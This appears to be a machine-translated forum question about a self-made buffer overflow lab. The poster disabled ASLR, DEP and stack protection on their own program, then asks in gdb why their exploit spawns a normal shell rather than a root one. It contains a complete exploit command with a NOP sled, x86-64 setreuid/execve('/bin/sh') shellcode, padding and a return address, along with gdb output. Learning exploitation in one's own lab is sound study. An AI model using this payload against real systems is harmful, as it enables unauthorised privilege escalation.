我正在尝试一个基本的缓冲区溢出攻击,它会产生一个 root shell。我面临“从子进程分叉后调度* *”的问题
我如何摆脱这个并产生根外壳?
我试图以普通用户的身份在我的 gdb 中生成 root shell(显然)。我已经以各种可能的方式编译了易受攻击的程序:我禁用了 ALSR...禁用 DEP...使用了 -fno-stack-保护者编译它
当我在我的 gdb 中运行它时,我得到了这个 -->
还有一件事:缓冲区大小为 100,并且在 120 处发生分段错误!
所以 60bytes of \x90 + size 50 of shellcode + size 10 of "A"(padding) + Overwritten address(8) = (60+50+10=120; 120+overwritten address=128)
[bhabi@localhost buffer]$ gdb -q bof
(gdb) r `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'`
启动程序:
/home/bhabi/buffer/bof `perl -e 'print "\x90" x 60, "\x48\x31\xc0\x48\x83\xc0\x71\x48\x31\xff\x48\x31\xf6\x0f\x05\xeb\x13\x48\x31\xc0\x48\x83\xc0\x3b\x5f\x88\x67\x07\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x90", "A" x 10, "\x60\xe4\xff\xff\xff\x7f\x00\x00"'
process 7*** is executing new program: /bin/bash
Missing separate debuginfos, use: debuginfo-install glibc-2.14.90-24.fc16.9.x86_64
Detaching after fork from child process 7***.
Detaching after fork from child process 7***.
Detaching after fork from child process 7**.
[bhabi@localhost buffer]$
我期待 [root@localhost 缓冲区]$`
我什至试过
set follow-fork-mode child
set detach-on-fork off